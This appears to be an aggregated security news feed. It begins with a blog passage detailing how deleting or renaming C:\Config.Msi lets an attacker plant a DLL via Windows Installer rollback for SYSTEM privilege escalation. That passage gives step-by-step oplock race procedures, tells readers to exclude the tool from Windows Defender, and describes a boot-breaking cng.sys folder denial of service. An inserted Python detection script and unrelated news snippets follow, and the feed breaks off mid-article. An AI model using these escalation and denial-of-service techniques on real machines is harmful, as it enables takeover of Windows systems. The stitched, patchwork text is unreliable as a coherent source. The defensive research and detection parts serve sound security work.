In the simplest scenario, the location for these records is a folder named C:\Config.Msi. During an installation, the Windows Installer service creates a folder named C:\Config.Msi and populates it with rollback information. Whenever the install process makes a change to the system, Windows Installer records the change in a file of type .rbs (rollback script) within C:\Config.Msi. Additionally, whenever the install overwrites an older version of some file with a newer version, Windows Installer will place a copy of the original file within C:\Config.Msi. This type of file will be given the .rbf (rollback file) extension. In case an incomplete install needs to be rolled back, the service will read the .rbs and .rbf files and use them to revert the system to the state that existed before the install.

This mechanism must be protected against tampering. If a malicious user were able to alter the .rbs and/or .rbf files before they are read, arbitrary changes to the state of the system could occur during rollback. Therefore, Windows Installer sets a strong DACL on C:\Config.Msi and the enclosed files.

Here is where an opening arises, though: what if an attacker has an arbitrary folder delete vulnerability? They can use it to completely remove C:\Config.Msi immediately after Windows Installer creates it. The attacker can then recreate C:\Config.Msi with a weak DACL (note that ordinary users are allowed to create folders at the root of C:\). Once Windows Installer creates its rollback files within C:\Config.Msi, the attacker will be able to replace C:\Config.Msi with a fraudulent version that contains attacker-specified .rbs and .rbf files. Then, upon rollback, Windows Installer will make arbitrary changes to the system, as specified in the malicious rollback scripts. Note that the only required exploit primitive here is the ability to delete an empty folder. Moving or renaming the folder works equally well.

From Arbitrary Folder Delete/Move/Rename to SYSTEM EoP

In conjunction with this article, we are releasing source code for Abdelhamid Naceri's privilege escalation technique. This exploit has wide applicability in cases where you have a primitive for deleting, moving, or renaming an arbitrary empty folder in the context of SYSTEM or an administrator. The exploit should be built in the Release configuration for either x64 or x86 to match the architecture of the target system. Upon running the exploit, it will prompt you to initiate a delete of C:\Config.Msi. You can do this by triggering an arbitrary folder delete vulnerability, or, for testing purposes, you can simply run rmdir C:\Config.Msi from an elevated command prompt. Upon a successful run, the exploit will drop a file to C:\Program Files\Common Files\microsoft shared\ink\HID.DLL. You can then get a SYSTEM command prompt by starting the On-Screen Keyboard osk.exe and then switching to the Secure Desktop, for example by pressing Ctrl-Alt-Delete.

The exploit contains an .msi file. The main thing that's special about this .msi is that it contains two custom actions: one that produces a short delay, and a second that throws an error. When the Windows Installer service tries to install this .msi, the installation will halt midway and roll back. By the time the rollback begins, the exploit will have replaced the contents of C:\Config.Msi with a malicious .rbs and .rbf. The .rbf contains the bits of the malicious HID.DLL, and the .rbs instructs Windows Installer to "restore" it to our desired location (C:\Program Files\Common Files\microsoft shared\ink\).

The full mechanism of the EoP exploit is as follows:

1. The EoP creates a dummy C:\Config.Msi and sets an oplock.
2. The attacker triggers the folder delete vulnerability to delete C:\Config.Msi (or move C:\Config.Msi elsewhere) in the context of SYSTEM (or admin). Due to the oplock, the SYSTEM process is forced to wait.
3. Within the EoP, the oplock callback is invoked. The following several steps take place within the callback.
4. The EoP moves the dummy C:\Config.Msi elsewhere. This is done so that the oplock remains in place and the vulnerable process is forced to continue waiting, while the filesystem location C:\Config.Msi becomes available for other purposes (see further).
5. The EoP spawns a new thread that invokes the Windows Installer service to install the .msi, with UI disabled.
6. The callback thread of the EoP continues and begins polling for the existence of C:\Config.Msi. For reasons that are not clear to me, Windows Installer will create C:\Config.Msi, use it briefly for a temp file, delete it, and then create it a second time to use for rollback scripts. The callback thread polls C:\Config.Msi to wait for each of these actions to take place.
7. As soon as the EoP detects that Windows Installer has created C:\Config.Msi for the second time, the callback thread exits, releasing the oplock. This allows the vulnerable process to proceed and delete (or move, or rename) the C:\Config.Msi created by Windows Installer.
8. The EoP main thread resumes. It repeatedly attempts to create C:\Config.Msi with a weak DACL. As soon as the vulnerable process deletes (or moves, or renames) C:\Config.Msi, the EoP's create operation succeeds.
9. The EoP watches the contents of C:\Config.Msi and waits for Windows Installer to create an .rbs file there.
10. The EoP repeatedly attempts to move C:\Config.Msi elsewhere. As soon as Windows Installer closes its handle to the .rbs, the move succeeds, and the EoP proceeds.
11. The EoP creates C:\Config.Msi one final time. Within it, it places a malicious .rbs file having the same name as the original .rbs. Together with the .rbs, it writes a malicious .rbf.
12. After the delay and the error action specified in the .msi, Windows Installer performs a rollback. It consumes the malicious .rbs and .rbf, dropping the DLL.

Note that at step 7, there is a race condition that sometimes causes problems. If the vulnerable process does not immediately awaken and delete C:\Config.Msi, the window of opportunity may be lost, because Windows Installer will soon open a handle to C:\Config.Msi and begin writing an .rbs there. At that point, deleting C:\Config.Msi will no longer work, because it is not an empty folder. To avoid this, it is recommended to run the EoP on a system with a minimum of 4 processor cores. A quiet system, where not much other activity is taking place, is probably ideal. If you do experience a failure, it will be necessary to retry the EoP and trigger the vulnerability a second time.

From Arbitrary File Delete to SYSTEM EoP

The technique described above assumes a primitive that deletes an arbitrary empty folder. Often, though, one has a file delete primitive as opposed to a folder delete primitive. That was the case with Abdelhamid Naceri's User Profile bug. To achieve SYSTEM EoP in this case, his exploit used one additional trick, which we will now explain.

In NTFS, the metadata (index data) associated with a folder is stored in an alternate data stream on that folder. If the folder is named C:\MyFolder, then the index data is found in a stream referred to as C:\MyFolder::$INDEX_ALLOCATION. Some implementation details can be found here. For our purposes, though, what we need to know is this: deleting the ::$INDEX_ALLOCATION stream of a folder effectively deletes the folder from the filesystem, and a stream name, such as C:\MyFolder::$INDEX_ALLOCATION, can be passed to APIs that expect the name of a file, including DeleteFileW. So, if you are able to get a process running as SYSTEM or admin to pass an arbitrary string to DeleteFileW, then you can use it not only as a file delete primitive but also as a folder delete primitive. From there, you can get a SYSTEM EoP using the exploit technique discussed above. In our case, the string you want to pass is C:\Config.Msi::$INDEX_ALLOCATION.

Be advised that success depends on the particular code present in the vulnerable process. If the vulnerable process simply calls DeleteFileA/DeleteFileW, you should be fine. In other cases, though, the privileged process performs other associated actions, such as checking the attributes of the specified file. This is why you cannot test this scenario from the command prompt by running del C:\Config.Msi::$INDEX_ALLOCATION.

From Folder Contents Delete to SYSTEM EoP

Leveling up once more, let us suppose that the vulnerable SYSTEM process does not allow us to specify an arbitrary folder or file to be deleted, but we can get it to delete the contents of an arbitrary folder, or alternatively, to recursively delete files from an attacker-writable folder. Can this also be used for EoP? Researcher Abdelhamid Naceri demonstrated this as well, in a subsequent submission in July 2021. In this submission he detailed a vulnerability in the SilentCleanup scheduled task, running as SYSTEM. This task iterates over the contents of a temp folder and deletes each file it finds there. His technique was as follows:

1. Create a subfolder, temp\folder1.
2. Create a file, temp\folder1\file1.txt.
3. Set an oplock on temp\folder1\file1.txt.
4. Wait for the vulnerable process to enumerate the contents of temp\folder1 and try to delete the file file1.txt it finds there. This will trigger the oplock.
5. When the oplock triggers, perform the following in the callback:
   a. Move file1.txt elsewhere, so that temp\folder1 is empty and can be deleted. We move file1.txt as opposed to just deleting it because deleting it would require us to first release the oplock. This way, we maintain the oplock so that the vulnerable process continues to wait, while we perform the next step.
   b. Recreate temp\folder1 as a junction to the \RPC Control folder of the object namespace.
   c. Create a symlink at \RPC Control\file1.txt pointing to C:\Config.Msi::$INDEX_ALLOCATION.
6. When the callback completes, the oplock is released and the vulnerable process continues execution. The delete of file1.txt becomes a delete of C:\Config.Msi.

Readers may recognize the symlink technique involving \RPC Control from James Forshaw's symboliclink-testing-tools. Note, though, that it's not sufficient to set up the junction from temp\folder1 to \RPC Control and then let the arbitrary file delete vulnerability do its thing. That's because \RPC Control is not an enumerable file system location, so the vulnerable process would not be able to find \RPC Control\file1.txt via enumeration. Instead, we must start off by creating temp\folder1\file1.txt as a bona fide file, allowing the vulnerable process to find it through enumeration. Only afterward, just as the vulnerable process attempts to open the file for deletion, we turn temp\folder1 into a junction pointing into the object namespace.

For working exploit code, see project FolderContentsDeleteToFolderDelete. Note that the built-in malware detection in Windows will flag this process and shut it down. I recommend adding a "Process" exclusion for FolderContentsDeleteToFolderDelete.exe.

You can chain these two exploits together. To begin, run FolderOrFileDeleteToSystem and wait for it to prompt you to trigger privileged deletion of Config.Msi. Then, run FolderContentsDeleteToFolderDelete /target C:\Config.Msi. It will prompt you to trigger privileged deletion of the contents of C:\test1. If necessary for your exploit primitive, you can customize this location using the /initial command-line switch. For testing purposes, you can simulate the privileged folder contents deletion primitive by running del /q C:\test1\* from an elevated command prompt. FolderContentsDeleteToFolderDelete will turn this into a delete of C:\Config.Msi, and this will enable FolderOrFileDeleteToSystem to drop the HID.DLL. Finally, open the On-Screen Keyboard and hit Ctrl-Alt-Delete for your SYSTEM shell.

From Arbitrary Folder Create to Permanent DoS

Before closing, we'd like to share one more technique we learned from this same researcher. Suppose you have an exploit primitive for creating an arbitrary folder as SYSTEM or admin. Unless the folder is created with a weak DACL, it doesn't sound like this would be something that could have any security impact at all. Surprisingly, though, it does: it can be used for a powerful denial of service. The trick is to create a folder such as this one:

C:\Windows\System32\cng.sys

Normally there is no file or folder by that name. If an attacker name squats on that filesystem location with an extraneous file or even an empty folder, the Windows boot process is disrupted. The exact mechanism is a bit of a mystery. It would appear that Windows attempts to load the cng.sys kernel module from the improper location and fails, and there is no retry logic that allows it to continue and locate the proper driver. The result is a complete inability to boot the system. Other drivers can be used as well for the same effect. Depending on the vulnerability at hand, this DoS exploit could even be a remote DoS, as nothing is required besides the ability to drop a single folder or file.

Conclusion

The techniques we've presented here show how some rather weak exploit primitives can be used for great effect. We have learned that:

• An arbitrary folder delete/move/rename (even of an empty folder), as SYSTEM or admin, can be used to escalate to SYSTEM.
• An arbitrary file delete, as SYSTEM or admin, can usually be used to escalate to SYSTEM.
• A delete of contents of an arbitrary folder, as SYSTEM or admin, can be used to escalate to SYSTEM.
• A recursive delete, as SYSTEM or admin, of contents of a fixed but attacker-writable folder (such as a temp folder), can be used to escalate to SYSTEM.
• An arbitrary folder create, as SYSTEM or admin, can be used for a permanent system denial-of-service.
• An arbitrary file delete or overwrite, as SYSTEM or admin, even if there is no control of contents, can be used for a permanent system denial-of-service.

We would like to thank researcher Abdelhamid Naceri for his great work in developing these exploit techniques, as well as for the vulnerabilities he has been reporting to our program. We look forward to seeing more from him in the future. Until then, you can find me on Twitter at @HexKitchen, and follow the team for the latest in exploit techniques and security patches.

by Zero Day Initiative Blog
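The following Python is an added, defender-side example and is not part of the ZDI post or of the exploit code it releases. It flags file-system events that correspond to the two abuses the post describes: the rollback folder C:\Config.Msi being removed, moved, recreated or populated with .rbs/.rbf files by anything other than the Windows Installer service (including a delete addressed through the ::$INDEX_ALLOCATION stream), and a driver name such as cng.sys being squatted directly in System32. The event schema (loosely modelled on Sysmon file events), the msiexec.exe paths treated as the legitimate installer, and the sample events are all constructed assumptions; cng.sys is the only driver name taken from the post.

```python
"""Detection logic for Config.Msi rollback abuse and driver name squatting.

Added, defender-side example; not ZDI's or the researcher's code. Events use a
constructed, simplified schema loosely modelled on Sysmon file events:
EventType (FileCreate / FileDelete / FileRename), TargetFilename, Image and an
optional IsDirectory flag.
"""
import json
import ntpath

# Folder the Windows Installer service uses for rollback scripts (.rbs) and
# rollback files (.rbf); all comparisons are done in lower case.
ROLLBACK_DIR = r"c:\config.msi"
SYSTEM32_DIR = r"c:\windows\system32"

# Assumption: the Windows Installer service binary is the only process that
# should create, populate or remove C:\Config.Msi during an installation.
INSTALLER_IMAGES = {
    r"c:\windows\system32\msiexec.exe",
    r"c:\windows\syswow64\msiexec.exe",
}

# Driver names that belong under System32\drivers and never directly in
# System32. cng.sys is the name from the post; extending the set with other
# drivers is left to the operator (assumption).
SQUATTABLE_DRIVERS = {"cng.sys"}


def normalise_path(path: str) -> str:
    """Lower-case, strip a trailing backslash and drop an NTFS stream suffix.

    Deleting C:\\Config.Msi::$INDEX_ALLOCATION removes the folder itself, so a
    stream-qualified path has to match the same rule as the plain folder path.
    """
    base = path.split("::", 1)[0]
    return base.rstrip("\\").lower()


def analyse_event(event: dict) -> list:
    """Return the findings for one file event; an empty list means benign."""
    findings = []
    kind = event["EventType"]
    path = normalise_path(event["TargetFilename"])
    image = event.get("Image", "").lower()
    is_dir = bool(event.get("IsDirectory", False))
    from_installer = image in INSTALLER_IMAGES
    parent, name = ntpath.split(path)

    if path == ROLLBACK_DIR and not from_installer:
        if kind in ("FileDelete", "FileRename"):
            # The primitive the EoP chain needs: a process other than msiexec
            # removing or moving the rollback folder.
            findings.append(f"{kind} of {ROLLBACK_DIR} by non-installer process {image}")
        elif kind == "FileCreate":
            # The folder being re-created by a non-installer process (the post
            # describes the attacker re-creating it with a weak DACL).
            findings.append(f"{ROLLBACK_DIR} created by non-installer process {image}")

    if (kind == "FileCreate" and parent == ROLLBACK_DIR
            and not from_installer and name.endswith((".rbs", ".rbf"))):
        # Rollback artefacts written by anything other than msiexec are the
        # attacker-supplied .rbs/.rbf that a rollback would consume.
        findings.append(f"rollback artefact {name} written by non-installer process {image}")

    if kind == "FileCreate" and path.startswith(SYSTEM32_DIR + "\\") and name.endswith(".sys"):
        if is_dir:
            # A directory named like a driver is never legitimate.
            findings.append(f"directory named like a driver created at {path}")
        elif parent == SYSTEM32_DIR and name in SQUATTABLE_DRIVERS:
            # A known driver name squatted directly in System32.
            findings.append(f"driver name squat: {name} created directly in System32")
    return findings


def analyse_log(lines) -> dict:
    """Map the index of each offending JSON line to its findings."""
    report = {}
    for idx, line in enumerate(lines):
        findings = analyse_event(json.loads(line))
        if findings:
            report[idx] = findings
    return report


# Constructed sample events (not real telemetry).
SAMPLE_LOG = [json.dumps(e) for e in [
    {"EventType": "FileCreate", "TargetFilename": r"C:\Config.Msi", "IsDirectory": True,
     "Image": r"C:\Windows\System32\msiexec.exe"},
    {"EventType": "FileDelete", "TargetFilename": r"C:\Config.Msi::$INDEX_ALLOCATION",
     "Image": r"C:\Windows\System32\svchost.exe"},
    {"EventType": "FileCreate", "TargetFilename": r"C:\Config.Msi", "IsDirectory": True,
     "Image": r"C:\Users\alice\AppData\Local\Temp\tool.exe"},
    {"EventType": "FileCreate", "TargetFilename": r"C:\Config.Msi\1a2b.rbs",
     "Image": r"C:\Users\alice\AppData\Local\Temp\tool.exe"},
    {"EventType": "FileCreate", "TargetFilename": r"C:\Config.Msi\1a2b.rbf",
     "Image": r"C:\Users\alice\AppData\Local\Temp\tool.exe"},
    {"EventType": "FileCreate", "TargetFilename": r"C:\Config.Msi\2c3d.rbs",
     "Image": r"C:\Windows\System32\msiexec.exe"},
    {"EventType": "FileCreate", "TargetFilename": r"C:\Windows\System32\cng.sys",
     "IsDirectory": True, "Image": r"C:\Windows\System32\svchost.exe"},
    {"EventType": "FileCreate", "TargetFilename": r"C:\Windows\System32\drivers\cng.sys",
     "Image": r"C:\Windows\servicing\TrustedInstaller.exe"},
    {"EventType": "FileCreate", "TargetFilename": r"C:\Users\alice\Documents\notes.txt",
     "Image": r"C:\Windows\System32\notepad.exe"},
]]


if __name__ == "__main__":
    for idx, findings in analyse_log(SAMPLE_LOG).items():
        for finding in findings:
            print(f"event {idx}: {finding}")
```

To run this over real telemetry, map your sensor's file-create and file-delete records onto the keys the functions expect; a rename or move event should be mapped to FileRename, since the post notes that moving or renaming the folder works as well as deleting it. The IsDirectory flag is what separates the DoS squat from a legitimate .sys file in System32, and cng.sys written under System32\drivers by a servicing process is deliberately not flagged.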

An old but persistent email scam known as "sextortion" has a new personalized touch: The missives, which claim that malware has captured webcam footage of recipients pleasuring themselves, now include a photo of the target's home in a bid to make threats about publishing the videos more frightening and convincing.

by Krebs on Security

CERT-In's advisory on Palo Alto Networks vulnerabilities and WikiLoader's fake GlobalProtect installers highlight major security risks.

Key Takeaways

CERT-In has issued a critical advisory highlighting vulnerabilities in multiple Palo Alto Networks applications, including GlobalProtect, Cloud NGFW, PAN-OS, and Cortex XSOAR. Concurrently, new malware distribution methods involving WikiLoader have been detected, leveraging spoofed GlobalProtect installers. The vulnerabilities identified include privilege escalation (CVE-2024-5915), information disclosure (CVE-2024-5916), and command injection (CVE-2024-5914). WikiLoader, a sophisticated loader, uses advanced evasion techniques such as SEO poisoning to distribute its payload. Specific versions of affected software and newly observed malware tactics require immediate attention. Timely updates and robust defense mechanisms are critical for mitigating these risks. Recommended actions include upgrading affected software, restricting access, using threat detection tools, and staying vigilant against sophisticated malware campaigns like WikiLoader.

Overview

CERT-In's recent advisory and the emergence of WikiLoader malware highlight pressing security concerns involving Palo Alto Networks applications and new malware distribution techniques. CERT-In has pinpointed critical vulnerabilities in GlobalProtect, Cloud NGFW, PAN-OS, and Cortex XSOAR. These vulnerabilities range from privilege escalation and information disclosure to command injection. In parallel, the WikiLoader campaign, which uses fake GlobalProtect installers for malware distribution, illustrates the increasing sophistication of cyber threats. The vulnerabilities span multiple Palo Alto Networks applications, each with varying degrees of impact and risk. The GlobalProtect app for Windows, a widely used tool for secure remote access, is affected across several versions. Specifically, versions 6.3 < 6.3.1, 6.2 < 6.2.4, 6.1 < 6.1.5, 6.0 < 6.0.x, and 5.1 < 5.1.x are impacted.

Detailed Description of Vulnerabilities and Malware Campaign

1. Privilege Escalation Vulnerability (CVE-2024-5915)

CVE-2024-5915 is a local privilege escalation vulnerability found in the GlobalProtect app for Windows. This issue arises from an unspecified error that allows a local user to execute programs with elevated privileges, potentially compromising the entire system. The flaw can enable an attacker who already has local access to gain administrative control over the system, leading to a high risk of system-wide compromise. The vulnerability is rated as MEDIUM, with a CVSSv4.0 Base Score of 5.2. The attack vector is local, which means that the attacker needs physical or remote desktop access to exploit the flaw. The attack complexity is low, indicating that exploiting the vulnerability does not require sophisticated techniques. The impact can be significant, leading to potential breaches of confidentiality, integrity, and availability. The vulnerability impacts GlobalProtect App versions 6.3 < 6.3.1, 6.2 < 6.2.4, 6.1 < 6.1.5, 6.0 < 6.0.x, and 5.1 < 5.1.x. Patches and updates are planned, with updates expected by August 2024 for version 6.3.1, November 2024 for 6.0.x, and December 2024 for 5.1.x. Until updates are applied, restricting access to GlobalProtect installation directories and ensuring they are protected from non-administrative modifications is recommended.

2. Information Disclosure Vulnerability (CVE-2024-5916)

CVE-2024-5916 is an information disclosure vulnerability affecting PAN-OS and Cloud NGFW. This flaw involves the exposure of sensitive information, such as secrets, passwords, and tokens of external systems, through configuration logs. A read-only administrator with access to these logs could view sensitive data, leading to potential unauthorized access to critical systems. This vulnerability is rated as MEDIUM, with a CVSSv4.0 Base Score of 6.0. The attack vector is network-based, meaning that an attacker can exploit the flaw remotely. The attack complexity is low, and no user interaction is required, making the vulnerability particularly concerning. The primary impact is on confidentiality, though integrity and availability are not directly affected. PAN-OS versions 11.0 < 11.0.4, 10.2 < 10.2.8, and Cloud NGFW versions prior to August 15 on Azure and August 23 on AWS are affected. Organizations should upgrade to PAN-OS 11.0.4, 10.2.8, or later versions and ensure Cloud NGFW is updated to versions released on or after the specified dates. It is also crucial to revoke any compromised credentials to prevent unauthorized access.

3. Command Injection Vulnerability (CVE-2024-5914)

CVE-2024-5914 is a command injection vulnerability found in the Cortex XSOAR CommonScripts pack. This issue allows unauthenticated attackers to execute arbitrary commands within the context of an integration container. Command injection vulnerabilities are particularly dangerous as they can be exploited to execute arbitrary commands, potentially leading to severe security breaches. The vulnerability has a HIGH severity rating, with a CVSSv4.0 Base Score of 7.0. The attack vector is network-based, and while the attack complexity is high, the lack of required user interaction makes it a significant threat. The impact includes substantial risks to confidentiality and integrity, with a potential low impact on availability. The vulnerability affects versions of the Cortex XSOAR CommonScripts pack before 1.12.33. To address the issue, upgrade to version 1.12.33 or later. Additionally, removing any integration usage of the ScheduleGenericPolling or GenericPollingScheduledTask scripts can help prevent exploitation.

The WikiLoader Malware Campaign

WikiLoader is a sophisticated loader that has been observed using advanced evasion techniques to distribute malware. The loader leverages SEO poisoning and fake GlobalProtect installers to deliver its payload. This method involves spoofing legitimate software installers, which increases the likelihood of successful malware delivery. Attackers have utilized SEO poisoning techniques to direct users to spoofed sites, such as bitbucket[.]org, where fake GlobalProtect installers containing WikiLoader components are hosted. This technique capitalizes on the high trust placed in legitimate software sources to trick users into downloading malicious payloads. Upon infection, WikiLoader downloads and extracts additional components, executes them, and uses legitimate binaries for side-loading. The malware creates persistence on the system through randomized file names and employs various obfuscation methods to avoid detection. WikiLoader includes several anti-analysis measures, such as detecting virtual machine environments to evade sandbox analysis, displaying misleading error messages, and employing obfuscation through randomized folder names. These techniques are designed to hinder detection and analysis by security tools.

Recommendations and Mitigations

To effectively address the identified vulnerabilities and new malware threats, organizations should implement the following measures:

To address the vulnerabilities, apply the latest patches and updates for GlobalProtect, PAN-OS, Cloud NGFW, and Cortex XSOAR. Check for updates regularly and apply them promptly.

Limit access to GlobalProtect installation directories and ensure that sensitive credentials in PAN-OS are protected. Revoke any compromised credentials and review access controls to prevent unauthorized access.

Implement and configure threat detection tools to monitor for unusual activity and signs of infection. Utilize XQL queries to identify indicators of WikiLoader and other malware behaviors.

Provide staff with training and awareness programs on emerging threats and security best practices. Ensure that employees are informed about the risks of downloading software from untrusted sources and the importance of verifying software integrity.

Conduct regular vulnerability assessments and scans to identify and address potential security weaknesses. Ensure that all updates and patches are applied in a timely manner.

Conclusion

The recent CERT-In advisory and the emergence of the WikiLoader malware campaign highlight critical vulnerabilities and evolving cyber threats. The identified vulnerabilities in Palo Alto Networks applications and the sophisticated tactics employed by WikiLoader underscore the need for proactive security measures. By addressing the vulnerabilities through timely updates, restricting access, and employing robust defense mechanisms, organizations can significantly reduce the risk of exploitation. Additionally, staying alert against sophisticated malware campaigns and continuously improving security practices are essential for protecting systems and sensitive data. Implementing the recommended actions will help to protect against these risks and enhance the overall security posture.

The post CERT-In Advisory and WikiLoader Campaign: Comprehensive Overview of Recent Security Threats appeared first on Cyble.

by CYBLE

The City of Columbus filed a lawsuit against a researcher for trying to inform the public about the nature of the data stolen by a ransomware group.

by Malwarebytes Labs

Mobile users in Brazil are the target of a new malware campaign that delivers a new Android banking trojan named Rocinante. "This malware family is capable of performing keylogging using the Accessibility Service, and is also able to steal PII from its victims using phishing screens posing as different banks," Dutch security company ThreatFabric said. "Finally, it can use all this exfiltrated

by The Hacker News

URL validation bypasses are the root cause of numerous vulnerabilities including many instances of SSRF, CORS misconfiguration, and open redirection. These work by using ambiguous URLs to trigger URL

by PortSwigger Research

A step-by-step guide to backing up Notion notes, and migrating them to free rival apps Obsidian or AFFiNE.

by Kaspersky

Malware authors have iterated on one of the premier encryptors on the market, building something even bigger and better.

by Dark Reading

Understanding through visibility, managing through governance, and anticipating through continuous deployment will better prepare organizations for the next supply chain attack.

by Dark Reading

For Preparedness Month in September, Keeper Security, a provider of zero-trust and zero-knowledge cybersecurity software, has urged businesses to prepare for the rising tide of cyber threats by prioritising fundamental cybersecurity practices. With more sensitive data being stored online, the risk of breaches and exploitation is at an all-time high.  To defend against the most […] The post September is Preparedness Month appeared first on IT Security Guru.

by IT Security Guru

We deep dive into CVE-2024-27198, also known as the JetBrains TeamCity Multiple Authentication Bypass.

by Hack The Box Blog

The newest version of the Blink Mini features key improvements that make it worthy even for non-budget shoppers.

by ZDNET Security

For those working in the information security and cybersecurity industries, the technical impacts of a data breach are generally understood. But for those outside of these technical functions, such as executives, operators and business support functions, “explaining” the real impact of a breach can be difficult. Therefore, explaining impacts in terms of quantifiable financial figures […] The post Cost of a data breach: Cost savings with law enforcement involvement appeared first on Security Intelligence.

by Security Intelligence

In the digital realm, secrets (API keys, private keys, username and password combos, etc.) are the keys to the kingdom. But what if those keys were accidentally left out in the open in the very tools we use to collaborate every day? A Single Secret Can Wreak Havoc Imagine this: It's a typical Tuesday in June 2024. Your dev team is knee-deep in sprints, Jira tickets are flying, and Slack is

by The Hacker News

The oil and fracking giant says it is "working to identify effects" of the ongoing cyberattack on its oil and fracking operations. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

2024-09-03 12:33:45

Name That Edge Toon: Bug Off

Feeling creative? Submit your caption and our panel of experts will reward the winner with a $25 Amazon gift card.

by Dark Reading

Check Point® Software Technologies Ltd. today introduced its cutting-edge Portal tailored for managed security service providers (MSSPs) and distributors. This innovative platform streamlines service delivery and simplifies the business experience with Check Point. As highlighted by Canalys, the global MSSP market is expected to expand at an annual rate of 14.2%, fueled by rising cyber […] The post Check Point Software Launches New MSSP Portal for Partners: Streamlining Service Delivery and Business Operations appeared first on IT Security Guru.

by IT Security Guru

The European Union’s Disinformation Lab (EU DisinfoLab) has recently exposed a sophisticated Russian influence campaign known as “DoppelGänger.”

by U.S. Cyber Command News

The threat of VBA macros has diminished since Microsoft prevented the execution of macros in Microsoft Office documents downloaded from the internet, but not all users are using the latest up-to-date Office versions and can still be vulnerable.

by Cisco Talos Blog

Check out the August updates in Compliance Plus so you can stay on top of featured compliance training content.

by KnowBe4

Sooner or later, every IT leader runs into a virtual brick wall. That's when it's helpful to have some trusted colleagues to turn to for advice and support.

by ITPro Today

Private companies must prioritize digital inclusivity to enhance user experience, protect their reputation, and tap into a broader customer base.

by ITPro Today

Crushing FUD: Embracing Ethical Hackers to Strengthen Cybersecurity
Antoine Willia… Tue, 09/03/2024 - 07:58

What is FUD?

Fear, Uncertainty, and Doubt (FUD) are central blockers to high-efficacy security programs by creating a climate of fear and hesitation, which impedes effective decision-making and proactive measures. The primary goal of FUD is to create anxiety and distrust, which can lead to paralysis in security operations and a defensive rather than a proactive mindset.

Examples of FUD

Hackers Using Reports as Leverage: Companies may worry that hackers will make sensitive security reports public without consent, potentially exposing vulnerabilities before they can be mitigated. Cybercriminals may threaten to release or withhold critical security findings unless a ransom is paid, leveraging fear to coerce companies into compliance.
Knocking Assets Offline: The fear of attackers taking critical assets offline or causing general product disruption can paralyze decision-making and lead to overly conservative security practices.
Seeing Hackers as Criminals: The stereotype of hackers as solely malicious actors creates fear and mistrust, hindering collaboration with ethical hackers and security researchers.
Lack of Trust: General distrust within the security community, whether towards software vendors, security solutions, or even internal teams, exacerbates uncertainty and hinders cooperation.
Being Overwhelmed with New Vulnerabilities: The rapid influx of new vulnerabilities can overwhelm security teams without a proper triage, escalation, and remediation process, leading to a sense of helplessness.
Exceeding Engineering Capacity to Remediate Vulnerabilities: When the volume of vulnerabilities outpaces the ability of engineering teams to address them, it can create fear of inevitable breaches and system failures.
Brand Damage: The fear that any security incident, no matter how minor, will cause irreparable damage to a company's reputation can lead to excessive risk aversion.
Legal Ramifications: Concerns about the legal consequences of breaches, including fines and regulatory actions, can cause a team to create more roadblocks for ethical hackers during testing.

Why FUD is Hindering Security Programs

FUD significantly hinders cybersecurity programs by creating a paralyzing environment where decision-makers become overly cautious, leading to delays in implementing necessary security measures. This fear-driven inaction leaves organizations vulnerable to preventable attacks. Additionally, FUD often results in the misallocation of resources, as companies may invest heavily in less effective security measures out of fear, diverting critical resources away from more impactful solutions. The pervasive sense of fear and uncertainty erodes trust within the organization and with external partners, hampering collaboration and information sharing that are essential for effective cybersecurity.

Moreover, the constant pressure of dealing with FUD can lead to burnout and low morale among security professionals, decreasing overall productivity and effectiveness. This environment stifles innovation, as fear of potential vulnerabilities in new technologies can lead to resistance against adopting innovative solutions, leaving organizations behind in security advancements. Ultimately, FUD fosters a reactive rather than proactive security posture, where organizations respond to threats as they arise instead of preparing for and mitigating potential risks. To overcome these challenges, it is crucial to cultivate a culture of trust, transparency, and collaboration, replacing FUD with informed, strategic decision-making to enhance the overall security posture.

Combatting FUD: The HackerOne Journey

HackerOne's solution effectively crushes FUD by guiding customers through a comprehensive security journey. It begins with penetration testing (pentest) to identify and report initial vulnerabilities, providing a clear understanding of potential threats. Following this, we implement a Vulnerability Disclosure Program (VDP), which serves as a public channel for ethical hackers to submit bugs, ensuring continuous monitoring and improvement. The journey then progresses to a private Bug Bounty Program, incentivizing ethical hackers to uncover more critical and impactful vulnerabilities within your product. This holistic approach not only enhances your security posture but also addresses and mitigates common sources of customer FUD by fostering transparency, collaboration, and proactive risk management.

Researching Crowd-Sourced Vulnerability Testing

What is a VDP and a BBP?

VDP (Vulnerability Disclosure Program): A VDP is a public intake process intended to give ethical hackers directions on how and where to report a vulnerability in an organization's systems. It ensures that vulnerabilities are identified and mitigated before they can be exploited. VDPs are often called the "see something, say something" safety net of the internet.
BBP (Bug Bounty Program): A BBP is similar to a VDP but offers monetary rewards to ethical hackers who identify and report security flaws in an organization's digital assets. This incentivizes more thorough testing and timely disclosure of vulnerabilities. BBPs have the option to be private or public, where you can choose which will work best for you.

What is Hacker-Powered Testing?

Hacker-powered testing leverages a global community of skilled security researchers to identify vulnerabilities in organizations' systems. By tapping into the collective expertise of ethical hackers, organizations can uncover security flaws that might go unnoticed by traditional security assessments.

Why Add Crowd-Sourced Testing to Your Security Posture?

Broader Coverage: Access a diverse pool of researchers with varied expertise.
Continuous Improvement: Ongoing testing and feedback help maintain a robust security posture.
Cost-Effective: Pay for valid vulnerability reports, reducing overall security costs.
Enhanced Innovation: Leverage innovative approaches from the hacker community to discover unique vulnerabilities.

Getting Organizational Buy-in for Bug Bounty and VDP

Before diving into crowd-sourced testing, it's crucial to get buy-in from key stakeholders within your organization. Team and method of socialization:

Engineering: Highlight the benefits of receiving detailed, actionable reports from skilled hackers, which can streamline the remediation process.
Leadership: Emphasize the strategic advantages, such as meeting compliance requirements and showcasing a proactive security stance to stakeholders.
Security Team: Discuss how crowd-sourced testing complements existing security measures, providing an additional layer of defense.

Starting with a Hacker-Powered Pentest

Kick off your journey with a Hacker-Powered Pentest:

Clear Compliance Needs: Ensure your organization meets regulatory requirements by identifying and mitigating vulnerabilities.
Dip Your Feet into Ethical Hacking: Gain firsthand experience working with ethical hackers in a controlled environment.
Report to Leadership: Share the positive results and insights gained from the pentest to build support for further testing.
Make the Case for Additional Testing: Use the success of the initial pentest to advocate for more extensive crowd-sourced testing programs.

Building Up to a Public VDP

Once you've established initial trust and familiarity with the hacker community, transition to a Public VDP:

General Attack Surface Coverage: Broaden the scope of testing to include all publicly accessible assets.
Responsible Disclosure: Provide a formal channel for hackers to report vulnerabilities responsibly.
Community Interaction: Learn to engage with the hacker community and address their findings effectively.
Cost-Effective Discovery: Identify low-hanging fruit at a lower cost than traditional methods.

Running a HackerOne Challenge

